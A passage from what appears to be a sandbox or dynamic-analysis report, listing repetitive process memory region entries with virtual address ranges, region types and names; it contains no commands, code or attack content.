start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4279 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4280 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4281 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4282 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4284 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4285 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4286 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4287 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4301 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4302 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4303 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4304 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4327 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4328 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4329 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4330 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4332 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4333 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4334 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4336 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4337 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4338 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4361 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4362 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4366 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4367 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4368 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4369 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4370 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4371 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4372 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4373 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4374 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4375 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4376 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4377 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4378 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4379 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4380 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4381 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4382 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4383 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4389 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4401 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4402 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4406 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4407 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4408 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4409 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4410 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4411 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4412 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4413 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4414 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4415 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4416 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4417 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4418 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4419 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4420 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4421 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4422 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4423 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4424 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4425 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4426 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4427 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4428 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4429 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4430 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4431 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4432 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4433 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4434 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4435 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4436 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4437 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4438 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4439 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4440 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4441 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4442 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 